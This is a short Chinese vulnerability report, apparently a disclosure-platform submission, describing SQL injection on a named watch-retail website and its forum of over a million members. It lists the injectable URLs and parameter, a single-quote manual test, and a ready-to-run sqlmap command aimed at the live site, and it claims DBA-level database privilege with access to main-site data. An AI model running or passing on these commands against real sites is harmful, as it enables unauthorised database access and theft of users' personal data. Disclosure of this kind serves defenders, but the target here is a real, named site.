注入点:http://www.iwatch365.com/watch/?px=6&desc=desc
http://www.iwatch365.com/index.php?m=content&c=index&a=lists&catid=81&ids=
(直接报错页面)
通过论坛:http://www.iwatch365.com/forum.php
得知会员总数 1189045
【手工测试】:
desc参数后加单引号
页面最下方直接报错
【sqlmap】:
python sqlmap.py -u "http://www.iwatch365.com/watch/?px=6&desc=desc" -p desc
【sqlmap截图】:
【数据库信息】:
【DBA权限 故虽然我没找到论坛的数据库表,但是既然最高权限了,主站下的数据都不在话下了吧?】
sqlmap全过程: